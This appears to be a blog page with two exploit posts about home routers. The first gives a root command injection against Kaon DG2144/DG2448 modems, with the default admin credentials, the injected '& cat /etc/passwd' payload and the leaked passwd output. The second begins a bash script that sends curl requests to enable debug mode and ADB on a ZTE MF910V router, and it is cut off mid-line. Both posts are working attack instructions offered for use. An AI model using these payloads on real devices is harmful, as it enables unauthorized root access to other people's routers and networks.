Posts

Showing posts from 2024

Kaon DG2144: Root Command Injection Exploit (How To Enable SSH)

Kaon Dg2448 & Kaon DG2144

Upon analyzing the modem's web service, it is evident that the functions accessible through the URLs http://192.168.1.1/#/home/administration and http://192.168.1.1/#/home/status are vulnerable to command execution as root. The specific functions susceptible to this vulnerability are Ping, Traceroute and NsLookup under Diagnostics, and Target under Connectivity Check, as well as numerous others.

To exploit this vulnerability, a user must be logged in with the credentials:

Username: admin
Password: admin@DG2144

By navigating to the Connectivity Check section on the main page and injecting the command '& cat /etc/passwd', sensitive information such as user details can be retrieved.

The obtained data includes the root user's information:

```
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
...
admin:x:0:0::/home/adm
```

Telstra ZteMF910/v Exploit Scripts

To utilize the exploits on the ZTE MF910V router, we will create a set of scripts in bash and HTML. These scripts will allow us to perform mode switching, enable ADB, execute AT commands, enable debug mode, exploit LFI, and gain root access. Let's go through each exploit and the corresponding scripts required.

Mode Switching and Enabling ADB

To perform mode switching and enable ADB on the ZTE MF910V router, we need to send HTTP requests to specific endpoints. We can achieve this using a bash script. Here's an example:

```bash
#!/bin/bash

# Mode Switching
MODE_SWITCH_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X"
MODE_SWITCH_VALUE="1" # Change X to 0 or 1
curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$MODE_SWITCH_VALUE" "$MODE_SWITCH_URL"

# Enabling ADB
ADB_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_pr
```